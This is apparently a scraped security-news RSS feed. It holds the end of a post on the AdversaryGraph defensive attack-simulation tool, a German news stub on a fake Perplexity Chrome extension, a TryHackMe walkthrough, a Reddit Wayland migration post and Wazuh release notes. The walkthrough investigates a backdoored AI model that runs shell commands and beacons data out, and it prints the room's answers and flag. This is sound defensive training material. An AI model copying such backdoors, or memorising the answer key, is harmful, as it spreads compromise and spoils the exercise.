include:</p><ul><li>HTTP and TLS service fingerprinting.</li><li>Public application probing.</li><li>Path discovery.</li><li>Sensitive file and configuration path access.</li><li>Directory traversal canaries.</li><li>SQL injection-shaped requests.</li><li>XSS-shaped requests.</li><li>SSRF-shaped requests.</li><li>Command-injection-shaped requests.</li><li>Web-shell access canaries.</li><li>Upload and download scenarios.</li><li>Failed-login flows.</li><li>Brute-force patterns.</li><li>Password spray.</li><li>User enumeration.</li><li>Beacon-like web traffic.</li><li>Exfiltration-shaped traffic.</li></ul><p>The key phrase is “attack-shaped canary.” The goal is to generate realistic defensive telemetry without exploiting a real target or executing harmful payloads.</p><h3>SIEM Forwarding</h3><p>Validation is incomplete if the event never reaches the SIEM.</p><p>The v5.0 SIEM forwarding panel sends selected Attack Simulation telemetry to HTTP(S) collectors. This can be used with Logstash HTTP input, Splunk HEC-style collectors, XpoLog/Logeye listeners, or custom webhook receivers.</p><p>Supported controls include:</p><ul><li>Full URL or raw host:port/path destination.</li><li>Direct destination mode.</li><li>Docker host gateway routing.</li><li>Automatic route selection.</li><li>Raw original line per request.</li><li>JSON event per request.</li><li>JSON Lines.</li><li>Batch envelope.</li><li>No auth.</li><li>Bearer token auth.</li><li>Token auth.</li><li>Basic auth.</li><li>Custom token header.</li><li>Source selection: access, auth, endpoint, WAF/security, error, structured JSONL, run JSONL, or all attacked-server events.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/988/0*DYOx-cPX4OK1g66v.png"></figure><p>The platform also keeps the last 10 non-secret SIEM destinations for reuse. This is useful during repeated parser testing, rule tuning, and dashboard validation.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/988/0*vpv4bXcWuUgvV4Hx.png"></figure><p>Credentials are not stored as part of the saved destination history. The saved address is intended to reduce typing friction, not to become a secret store.</p><h3>AI Attack Assistant</h3><p>The AI Attack Assistant is one of the main additions in v5.0.</p><p>It helps generate detection-engineering drills by building correlated telemetry stories around selected behavior.</p><p>The assistant supports three modes:</p><ol><li><strong>Selected TTP</strong>: generate a focused validation flow around the technique currently selected in the Attack Simulation page.</li><li><strong>Threat actor</strong>: generate a scenario inspired by a threat actor’s known behavior and ATT&amp;CK profile.</li><li><strong>Challenge Me</strong>: generate a blind multi-phase detection challenge for the analyst.</li></ol><p>There is also a <strong>Complicated attack</strong> option. When enabled, the assistant builds longer multi-source flows across telemetry types such as:</p><ul><li>Windows Security Event Log.</li><li>Sysmon.</li><li>EDR process and file telemetry.</li><li>DNS logs.</li><li>Proxy logs.</li><li>Firewall traffic logs.</li><li>Web access logs.</li><li>WAF/security logs.</li><li>Authentication logs.</li></ul><p>The goal is not to normalize everything into one generic schema. For complicated scenarios, the assistant should preserve source/vendor-shaped event patterns so the SIEM parser and rule logic are tested more realistically.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*R2jz_jH_4T-N9__R.png"></figure><h3>Coherent Kill Chains, Not Random Events</h3><p>A detection drill should not be a random list of suspicious events.</p><p>In v5.0, complicated scenarios are built as coherent attack chains. The chain has ordered phases, each phase has a reason, and each phase emits events that should correlate with the surrounding activity.</p><p>For example, a password-spray-to-foothold scenario may include:</p><ol><li>Username enumeration.</li><li>Multiple failed authentication attempts.</li><li>One successful logon after failures.</li><li>Endpoint discovery from the authenticated host.</li><li>Suspicious tool transfer.</li><li>Persistence or lateral discovery.</li></ol><p>That is much more useful than a single failed-login event.</p><p>The Attack Chain Graph makes this visible.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*-bkB_LbIx9r5Ro35.png"></figure><p>Each phase can show:</p><ul><li>Phase number.</li><li>ATT&amp;CK technique.</li><li>Telemetry source.</li><li>Event format.</li><li>Event count.</li><li>Detection goal.</li><li>Supporting tags.</li></ul><p>This helps the analyst understand whether the generated activity is a plausible kill chain or just a bag of indicators.</p><h3>Explain Attack</h3><p>When “Challenge Me” or a complex AI-generated scenario is used, the platform includes an <strong>Explain Attack</strong> action.</p><p>This panel explains:</p><ul><li>What the scenario is trying to simulate.</li><li>Why each phase appears in the chain.</li><li>Which telemetry sources matter.</li><li>What the analyst should search for.</li><li>What detections should fire.</li><li>Which false positives or tuning points should be considered.</li><li>What success criteria should be used.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*H7lfS2NaR1B5hvEV.png"></figure><p>This is useful for training and validation. It turns generated events into an exercise that a SOC analyst, detection engineer, or CTI analyst can actually follow.</p><h3>Named Scenario Library</h3><p>Release 5.0 includes a library of named coherent scenarios.</p><p>Examples include:</p><ul><li>Web App to Endpoint Compromise.</li><li>Password Spray to Valid Account Foothold.</li><li>SQL Injection to Data Theft.</li><li>Recon to Web Shell Persistence.</li><li>Valid Account to LSASS Access.</li><li>Password Spray to Exfiltration.</li><li>XSS Canary to Session Abuse.</li><li>SSRF Metadata Probe to C2.</li><li>Ransomware Precursor Chain.</li><li>Living-off-the-Land Transfer and Execution.</li><li>Internal Discovery After Foothold.</li><li>Web Enumeration to Password Spray.</li><li>Public App Exploit to Persistence.</li><li>Credential Dump to Cloud Upload.</li><li>Signed Binary Proxy to C2.</li><li>FIN7-style web, identity, and persistence flow.</li><li>APT29-style identity and PowerShell flow.</li><li>Lazarus-style delivery and exfiltration flow.</li><li>Noisy red-team drill.</li><li>Stealthy low-volume intrusion chain.</li><li>WAF bypass retry chain.</li><li>Service account abuse.</li><li>External recon to credential access.</li><li>C2 telemetry validation.</li><li>Persistence control validation.</li></ul><p>These are not meant to prove that a real actor attacked you. They are templates for detection validation and training. They help answer questions like:</p><ul><li>Does my SIEM parse this source?</li><li>Does my correlation rule see the sequence?</li><li>Does the detection alert only on one event or on the chain?</li><li>Can analysts reconstruct the story from logs?</li><li>Which telemetry source is missing?</li><li>Where do false positives appear?</li></ul><h3>Safety Boundaries</h3><p>Attack Simulation must be safe by design.</p><p>The v5.0 module follows several boundaries:</p><ul><li>It does not execute malware.</li><li>It does not run arbitrary commands.</li><li>It does not exploit arbitrary external targets.</li><li>Web simulation traffic is limited to predefined benign canaries against the local lab target.</li><li>SIEM forwarding sends generated Attack Simulation telemetry.</li><li>Unsafe URL schemes and metadata/link-local destinations are blocked.</li><li>Credentials used for forwarding are used only for the current request and are not stored.</li></ul><p>This matters because the target user is a defender. The feature is built for detection engineering, parser validation, SOC drills, and authorized lab workflows.</p><h3>How This Fits Detection Engineering</h3><p>Detection engineering is not only writing rules. It is a lifecycle:</p><ol><li>Understand the adversary behavior.</li><li>Map it to ATT&amp;CK or another behavior model.</li><li>Identify required telemetry.</li><li>Confirm that telemetry exists.</li><li>Confirm that parsing works.</li><li>Write detection logic.</li><li>Test the logic with realistic events.</li><li>Tune false positives.</li><li>Document assumptions and gaps.</li><li>Re-test when infrastructure or parsers change.</li></ol><p>AdversaryGraph v5.0 tries to support this lifecycle directly.</p><p>The CTI modules help with steps 1 and 2.</p><p>IOC and malware modules help enrich the investigation context.</p><p>Asset attack-surface mapping helps identify relevant entry points.</p><p>Attack Simulation helps with steps 3 through 8.</p><p>Reports and docs help with steps 9 and 10.</p><h3>Architecture Overview</h3><p>The self-hosted platform is built around a browser frontend and API backend.</p><p>At a high level:</p><ul><li>Frontend: React/Vite user interface.</li><li>Backend: FastAPI service.</li><li>Database: PostgreSQL for stored investigations and platform data.</li><li>Background jobs: Redis/Celery where needed.</li><li>ATT&amp;CK data: synchronized from MITRE sources.</li><li>AI providers: operator-configured providers such as Claude, OpenAI, Gemini, MiniMax, or local OpenAI-compatible services.</li><li>Malware workflow: MalwareGraph-backed analysis components.</li><li>Attack lab: Docker-based target services for controlled telemetry generation.</li><li>SIEM forwarding: HTTP(S) delivery to configured collectors.</li></ul><p>For the v5.0 web simulation flow, the important architectural distinction is:</p><p>AdversaryGraph does not simply invent an access log line for the UI. It sends real HTTP requests to the lab web target, and the lab web target emits server-side logs.</p><p>For AI-generated complicated scenarios, the goal is different. The assistant generates source-shaped telemetry for SIEM parser and detection validation. This is not proof of compromise, and it is not a replacement for live lab execution. It is a defensive validation tool for testing ingestion, parsers, correlation, dashboards, and analyst workflows.</p><h3>Example Use Case: Password Spray Detection</h3><p>A common detection engineering task is password spray validation.</p><p>The analyst wants to know:</p><ul><li>Do we ingest authentication failures?</li><li>Are usernames parsed correctly?</li><li>Can we count failures across many users?</li><li>Can we detect one source trying one password against many accounts?</li><li>Can we correlate a later successful login?</li><li>Can we connect the successful login to endpoint activity?</li></ul><p>With AdversaryGraph v5.0, the workflow becomes:</p><ol><li>Select a credential-access or brute-force related TTP.</li><li>Choose the password spray scenario.</li><li>Run the lab or AI-assisted flow.</li><li>Observe authentication-related events.</li><li>Forward the events to the SIEM.</li><li>Confirm the parser.</li><li>Confirm the rule.</li><li>Review the chain graph.</li><li>Use Explain Attack to document what should have happened.</li><li>Record gaps.</li></ol><p>The important part is the chain. A single 4625-like event is not enough. A realistic validation should include many failures, many users, timing, source consistency, and possibly one later success.</p><h3>Example Use Case: Web Recon to Exploit-Shaped Telemetry</h3><p>For a web application detection scenario, the analyst may want to test:</p><ul><li>Path discovery.</li><li>Sensitive file probing.</li><li>SQL injection-shaped requests.</li><li>XSS-shaped requests.</li><li>SSRF-shaped requests.</li><li>WAF canary classification.</li><li>Access-log parser behavior.</li><li>SIEM dashboards for web attacks.</li></ul><p>AdversaryGraph can run approved web canaries against the lab web target, then show the real target-side logs in the UI.</p><p>This lets the detection engineer validate more than a rule. It validates whether the web tier emits usable logs and whether the SIEM receives enough context to detect the behavior.</p><h3>Example Use Case: Malware Findings to Detection Validation</h3><p>The malware module can produce findings such as:</p><ul><li>Suspicious imports.</li><li>Strings.</li><li>Packed sample indicators.</li><li>Function-level behavior.</li><li>Potential IOCs.</li><li>ATT&amp;CK candidates.</li><li>AI-assisted summaries.</li></ul><p>Those findings can feed detection engineering:</p><ul><li>Which API calls should we monitor?</li><li>Which command lines or process patterns matter?</li><li>Which persistence mechanisms appear?</li><li>Which network indicators are useful?</li><li>Which behaviors should become validation scenarios?</li></ul><p>AdversaryGraph’s value is that malware findings do not stay isolated in a reverse-engineering note. They can be connected back to ATT&amp;CK and validation planning.</p><h3>Example Use Case: Asset Inventory to Attack Surface</h3><p>Asset inventories often live in spreadsheets, CMDB exports, or scanner output. The security team may know what exists, but not how to translate that into likely ATT&amp;CK entry points.</p><p>The Asset Attack Surface module helps with:</p><ul><li>Normalizing assets.</li><li>Identifying exposed services.</li><li>Scoring exposure.</li><li>Mapping likely entry points.</li><li>Proposing ATT&amp;CK candidates.</li><li>Creating saved cases.</li></ul><p>This connects directly to Attack Simulation because a high-risk public web application or VPN service should map to validation scenarios around external discovery, exploitation attempts, credential attacks, and logging coverage.</p><h3>What This Release Is Not</h3><p>It is important to define what v5.0 is not.</p><p>It is not an autonomous attack platform.</p><p>It is not a malware execution system.</p><p>It is not a replacement for a full cyber range.</p><p>It is not attribution proof.</p><p>It is not a guarantee that a detection works in production.</p><p>It is an analyst-assistance and validation platform. Its output should be reviewed by qualified analysts and detection engineers before operational use.</p><h3>What Makes v5.0 Different</h3><p>The main difference is the connection between CTI and validation.</p><p>Many tools stop at one of these points:</p><ul><li>Visualize ATT&amp;CK.</li><li>Extract TTPs.</li><li>Store IOCs.</li><li>Generate sample logs.</li><li>Run a lab attack.</li><li>Forward events.</li></ul><p>AdversaryGraph tries to connect these into one workflow:</p><ol><li>Understand the behavior.</li><li>Map it.</li><li>Enrich it.</li><li>Simulate it safely.</li><li>Observe telemetry.</li><li>Send it to the SIEM.</li><li>Explain what happened.</li><li>Document what passed and what failed.</li></ol><p>That is the direction I want the platform to continue moving.</p><h3>Getting Started</h3><p>If you want to explore the public interface:</p><p><a href="https://1200km.com/threat-matrix/">AdversaryGraph Web - Public ATT&amp;CK Workspace for AdversaryGraph | 1200km</a></p><p><strong>If you want the full private platform:</strong></p><pre>git clone https://github.com/anpa1200/adversarygraph.git<br>cd adversarygraph<br>cp .env.example .env<br>docker compose up</pre><p><strong>Then open:</strong></p><pre>http://localhost:3000</pre><p><strong>Read the full documentation here:</strong></p><p><a href="https://1200km.com/adversarygraph-docs/">AdversaryGraph Documentation - CTI-to-Detection Workbench | 1200km</a></p><p><strong>Attack Simulation guide:</strong></p><p><a href="https://1200km.com/adversarygraph-docs/attack-simulation/">Attack Simulation | AdversaryGraph Documentation - CTI-to-Detection Workbench | 1200km</a></p><p><strong>Project page:</strong></p><p><a href="https://1200km.com/adversarygraph/">AdversaryGraph AI - CTI-to-Detection Platform</a></p><p><strong>GitHub release:</strong></p><p><a href="https://github.com/anpa1200/adversarygraph/releases/tag/v5.0.0">Release AdversaryGraph v5.0.0 · anpa1200/adversarygraph</a></p><h3>Final Thoughts</h3><p>AdversaryGraph v5.0 is a step toward a more complete CTI-to-detection workflow.</p><p>The platform is still built around a simple idea: intelligence should not end as a static report. It should become a mapped, enriched, validated, and explainable defensive workflow.</p><p>With Attack Simulation, SIEM forwarding, real lab telemetry, AI-assisted scenario generation, and attack-chain explanation, v5.0 moves AdversaryGraph closer to that goal.</p><p>The next challenge is to continue improving realism: more telemetry sources, more lab targets, better parser validation, stronger scenario libraries, and deeper connections between malware analysis, asset exposure, and detection engineering.</p><p>If you work in CTI, SOC operations, detection engineering, malware analysis, or purple-team validation, I would be glad to hear feedback.</p><p>Project:</p><p><a href="https://github.com/anpa1200/adversarygraph">https://github.com/anpa1200/adversarygraph</a></p><p>Documentation:</p><p><a href="https://1200km.com/adversarygraph-docs/">https://1200km.com/adversarygraph-docs/</a></p><p>Live workspace:</p><p><a href="https://1200km.com/threat-matrix/">AdversaryGraph Web - Public ATT&amp;CK Workspace for AdversaryGraph | 1200km</a></p><p>Main page:</p><p><a href="https://1200km.com/">Andrey Pautov - CTI &amp; Detection Engineering</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=21873b2a6c39" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39">AdversaryGraph v5.0: From CTI Mapping to Attack Simulation and SIEM Validation</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome: Gefälschte Perplexity-Erweiterung spioniert Suchanfragen aus - it-daily.net]]></title>
<description><![CDATA[Sicherheitsforscher von Microsoft Threat Intelligence haben eine schadhafte Erweiterung im Chrome Web Store identifiziert, die sich als die KI- ...]]></description>
<link>https://tsecurity.de/de/3645194/it-security-nachrichten/chrome-gefaelschte-perplexity-erweiterung-spioniert-suchanfragen-aus-it-dailynet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645194/it-security-nachrichten/chrome-gefaelschte-perplexity-erweiterung-spioniert-suchanfragen-aus-it-dailynet/</guid>
<pubDate>Sat, 04 Jul 2026 12:24:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sicherheitsforscher von Microsoft Threat Intelligence haben eine schadhafte Erweiterung im Chrome Web Store identifiziert, die sich als die KI- ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome: Gefälschte Perplexity-Erweiterung spioniert Suchanfragen aus]]></title>
<description><![CDATA[Eine gefälschte Chrome-Erweiterung für Perplexity AI hat Suchanfragen abgefangen und Nutzerdaten gesammelt. Google hat das Add-on inzwischen entfernt.

Tags: #Chrome | #Cyber Crime | #Perplexity]]></description>
<link>https://tsecurity.de/de/3644849/it-security-nachrichten/chrome-gefaelschte-perplexity-erweiterung-spioniert-suchanfragen-aus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644849/it-security-nachrichten/chrome-gefaelschte-perplexity-erweiterung-spioniert-suchanfragen-aus/</guid>
<pubDate>Sat, 04 Jul 2026 07:53:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2024/12/Google-Chrome-Quelle-PREMIO-STOCK-Shutterstock-1098582578-1920.jpg" class="attachment-full size-full wp-post-image" alt="Google Chrome" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2024/12/Google-Chrome-Quelle-PREMIO-STOCK-Shutterstock-1098582578-1920.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2024/12/Google-Chrome-Quelle-PREMIO-STOCK-Shutterstock-1098582578-1920-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2024/12/Google-Chrome-Quelle-PREMIO-STOCK-Shutterstock-1098582578-1920-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2024/12/Google-Chrome-Quelle-PREMIO-STOCK-Shutterstock-1098582578-1920-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2024/12/Google-Chrome-Quelle-PREMIO-STOCK-Shutterstock-1098582578-1920-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Chrome: Gefälschte Perplexity-Erweiterung spioniert Suchanfragen aus 1"></p>
    Eine gefälschte Chrome-Erweiterung für Perplexity AI hat Suchanfragen abgefangen und Nutzerdaten gesammelt. Google hat das Add-on inzwischen entfernt.

<p>Tags: <a href="https://www.it-daily.net/thema/chrome">#Chrome</a> | <a href="https://www.it-daily.net/thema/cyber-crime">#Cyber Crime</a> | <a href="https://www.it-daily.net/thema/perplexity">#Perplexity</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TryHackMe: Payload Walkthrough]]></title>
<description><![CDATA[Arman Kumar03:14 — The Alert That Shouldn’t ExistThe alert arrived at 03:14.No deployments were scheduled. No infrastructure changes were logged. Yet the inference server had started making outbound HTTPS requests to an unknown address. The requests were blocked only after an automated detection ...]]></description>
<link>https://tsecurity.de/de/3644802/hacking/tryhackme-payload-walkthrough/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644802/hacking/tryhackme-payload-walkthrough/</guid>
<pubDate>Sat, 04 Jul 2026 07:06:56 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Arman Kumar</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*PxM-aOHl-IaNHRCb"></figure><h3>03:14 — The Alert That Shouldn’t Exist</h3><p>The alert arrived at <strong>03:14</strong>.</p><p>No deployments were scheduled. No infrastructure changes were logged. Yet the inference server had started making outbound HTTPS requests to an unknown address. The requests were blocked only after an automated detection rule triggered.</p><p>That meant one thing: something malicious had been running quietly in production.</p><p>This room revolves around investigating an <strong>AI supply chain compromise</strong>, where a malicious model was introduced into production and remained undetected for weeks.</p><h3>Starting the Investigation</h3><p>The incident directory contained:</p><ul><li>Deployment logs</li><li>Network logs</li><li>Production model</li><li>Candidate replacement model</li><li>Clean baseline model</li></ul><p>The first step was reconstructing the deployment timeline.</p><p>By reading deployment.log, it became clear that the replacement model came from an unexpected organization:</p><pre>trustworthy-ai-lab</pre><p>The name looked safe, but that’s exactly what made it suspicious.</p><h3>Dwell Time</h3><p>Next, I compared the deployment timestamp against the SOC alert.</p><p>The compromised model had been active for:</p><pre>21 days</pre><p>Three full weeks of undetected malicious activity.</p><p>That’s a huge detection gap.</p><h3>Decompiling the Production Model</h3><p>The production model needed deeper inspection.</p><p>After decompilation, the malicious payload revealed something dangerous: it could execute shell commands directly using:</p><pre>system()</pre><p>That immediately elevated the incident from suspicious to critical.</p><p>The payload then executed:</p><pre>hostname</pre><p>Why?</p><p>To fingerprint the compromised host before exfiltration.</p><p>Classic attacker behavior.</p><h3>Beacon Analysis</h3><p>The outbound traffic logs contained beacon data showing communication with external infrastructure.</p><p>The HTTP method used was:</p><pre>POST</pre><p>That confirmed the server wasn’t just checking connectivity — it was transmitting data outward.</p><h3>Candidate Replacement Model</h3><p>Engineering had staged a new model called:</p><pre>candidate_model.h5</pre><p>Before deployment, it needed inspection.</p><p>Running the supplied analysis tool exposed a suspicious layer:</p><pre>manipulate_output</pre><p>This suggested the replacement model may also have been compromised.</p><p>In other words: the attacker wasn’t done.</p><h3>Recovering the Flag</h3><p>The attacker split the campaign ID across multiple artifacts to avoid easy detection.</p><p>Combining data from:</p><ul><li>beacon_capture.log</li><li>Candidate model inspection</li></ul><p>Recovered the complete flag:</p><pre>THM{b4ckd00r_1n_pl41n_s1ght}</pre><h3>Final Answers</h3><ul><li>Replacement organization: trustworthy-ai-lab</li><li>Days before alert: 21</li><li>Execution function: system</li><li>Shell command: hostname</li><li>HTTP method: POST</li><li>Suspicious layer: manipulate_output</li></ul><h3>Flag</h3><pre>THM{b4ckd00r_1n_pl41n_s1ght}</pre><h3>Final Thoughts</h3><p>This room demonstrates why <strong>AI model supply chains must be treated like software supply chains</strong>.</p><p>A model file is not just weights.</p><p>It can contain:</p><ul><li>Executable payloads</li><li>Hidden backdoors</li><li>Data exfiltration logic</li><li>Persistence mechanisms</li></ul><p>Security teams must inspect models before deployment, verify provenance, and continuously monitor runtime behavior.</p><p>Because sometimes the most dangerous compromise is the one that looks completely normal.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=299cf414c360" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/tryhackme-payload-walkthrough-299cf414c360">TryHackMe: Payload Walkthrough</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Finally Switched to Wayland (This is gonna be a long one)]]></title>
<description><![CDATA[I finally had enough down time a couple of weeks ago to start the process of migrating to Wayland. I figured I'd share my experience for anyone who (like me) was/is concerned about how difficult the process may be or what changes may be required for someone who uses a more "niche" setup. Context ...]]></description>
<link>https://tsecurity.de/de/3642587/linux-tipps/finally-switched-to-wayland-this-is-gonna-be-a-long-one/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642587/linux-tipps/finally-switched-to-wayland-this-is-gonna-be-a-long-one/</guid>
<pubDate>Fri, 03 Jul 2026 04:08:15 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I finally had enough down time a couple of weeks ago to start the process of migrating to Wayland. I figured I'd share my experience for anyone who (like me) was/is concerned about how difficult the process may be or what changes may be required for someone who uses a more "niche" setup.</p> <p><strong>Context</strong><br> My primary device is a Thinkpad X280. My backup is essentially a mirrored setup on a T480s. I've been using Arch/Arch derivatives for well over a decade now, and I'm currently on Artix Linux. My main X11 workflow was DWM (heavily patched) with the typical suite of supporting apps (dmenu, rofi, st, dunst, dwmblocks, etc). My daily workflow centers heavily around the tags system with simple startup scripts depending on which apps I need for work on any given day versus when I'm just using casual email/browsing apps. Most daily apps are assigned to specific tags and I HEAVILY depend on the ability to right click a tag to show it's windows on another tag temporarily (for example, pulling over a floating browser quickly to research something then sending it back to it's home tag when I'm done). The other important aspect is my use of a 3rd gen Lenovo thunderbolt dock for swapping to a dual display setup when needed for more complex work flows.</p> <p><strong>The Switch</strong><br> I switched to MangoWM with waybar. The switch was relatively painless, as MangoWM is pretty much a prebuilt version of DWL with all the available patches most people would want, which is essentially the wayland version of DWM. I chose Mango of DWL mainly because the stagnant/slow development of DWL means it often falls behind current Wayland functionality, which is quite relevant since Wayland is VERY MUCH still a work-in-progress. The only real issues I ran into were configuring waybar and setting up tag/window rules. I eventually figured out the waybar stuff through reading docs and watching YouTube. Once figured out, it was quite simple to create a setup superior to my prior dwmblocks setup. The window rules were slightly more annoying because I learned that wayland identifies windows by their "appid" vs X11's method of using the "class". To make this more tedious, there's no true equivalent for xprop, so I had to learn how to use Mango's built-in IPC to find the appid I was looking for (grep will be very useful). Mango further complicates (or simplifies?) this by using a pseudo-fuzzy search algorithm for identifying the appid. For example, if I want to set a window rule for a PWA made through firefox, I don't have to quote the entire appid. I can just extract a unique string of characters from the appid and Mango will recognize it (pretty nifty once you get used to it).</p> <p><strong>Pros</strong><br> I'll truncate this since the post is already unreasonably long.</p> <ul> <li>Wayland is just smoother than X11/XLibre</li> <li>Built in compositing removes the need for picom/fastcompmgr</li> <li>Despite much of what I saw online before switching, resource usage is actually measurably less on my MangoWM setup vs my prior DWM setup</li> <li>Battery life actually improved for me (anywhere between 30 mins to 1.5 hours depending on usage)</li> <li>Many random X11-specific packages/config files are simply no longer necessary (xinit, xprop, XAUTHORITY, etc)</li> <li>MangoWM is just more pleasant to use with the built in transparency, blur, and simpler animations. Animations aren't a must for me, but I do have fond memories of compiz when my browser opens with a subtle zoom effect versus just popping into place</li> </ul> <p><strong>Cons</strong></p> <ul> <li>Trying to run a system without xwayland comes with MANY compromises depending on your workflow</li> <li>Many popular apps like virtualbox, steam, and bitwarden can't even launch without xwayland (which kinda feels like it defeats the purpose of moving away from X11). Zoom works, but completely messes with keyboard shortcuts, which led me to just switch to a PWA. I also swapped to a PWA for bitwarden, but didn't have simple alternatives to virtualbox and steam, so I ended up biting the bullet and installing xwayland</li> <li>Some apps simply won't work - even with xwayland (spacefm and megasync for me). I was able to get around the megasyc issue by switching to megaCMD and I begrudgingly swapped back to PCManFM with gvfs for file management</li> <li>While some "X11-specific" tools are no longer needed, their functionality simply isn't properly replicated for more advanced/niche workflows. For example, while "appid" is mostly a sufficient replacement for "Window Class" when setting up window rules, there are still some weird inconsistencies if you're used to the behavior under X11</li> </ul> <p>There's a lot more that could be said, but this post already risks being reported because of the length, so here's the TLDR. Wayland is very much usable in 2026 and is actually a better general computing experience than X11 for me. However, it does require some compromises and changes in your workflow. Despite what the vocal minority online says, much of the functionality that wayland lacks in comparison to xorg is very hyper-specific and only a small subset of users cannot replicate or find a reasonable alternative on wayland. I still see significant value in X11/XLibre maintenance depending on your use case, but as for me and my house, we will be transitioning to wayland</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/chozendude"> /u/chozendude </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1uls4cr/finally_switched_to_wayland_this_is_gonna_be_a/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uls4cr/finally_switched_to_wayland_this_is_gonna_be_a/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh v5.0.0 Beta 3]]></title>
<description><![CDATA[What's Changed

Improve cluster file synchronization error handling by @TomasTurina in #36129
Update trojan signatures to avoid false positives on modern distros by @Miguevrgo in #35927
Improve cluster merged file parameter validation by @vikman90 in #36204
Create a backup of local_rules.xml duri...]]></description>
<link>https://tsecurity.de/de/3641637/it-security-tools/wazuh-v500-beta-3/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641637/it-security-tools/wazuh-v500-beta-3/</guid>
<pubDate>Thu, 02 Jul 2026 17:49:41 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>Improve cluster file synchronization error handling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4454599181" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36129" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36129/hovercard" href="https://github.com/wazuh/wazuh/pull/36129">#36129</a></li>
<li>Update trojan signatures to avoid false positives on modern distros by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4390541461" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35927" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35927/hovercard" href="https://github.com/wazuh/wazuh/pull/35927">#35927</a></li>
<li>Improve cluster merged file parameter validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4476621950" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36204" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36204/hovercard" href="https://github.com/wazuh/wazuh/pull/36204">#36204</a></li>
<li>Create a backup of local_rules.xml during execution of IT analysisd tier 0 1 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4475277385" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36201" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36201/hovercard" href="https://github.com/wazuh/wazuh/pull/36201">#36201</a></li>
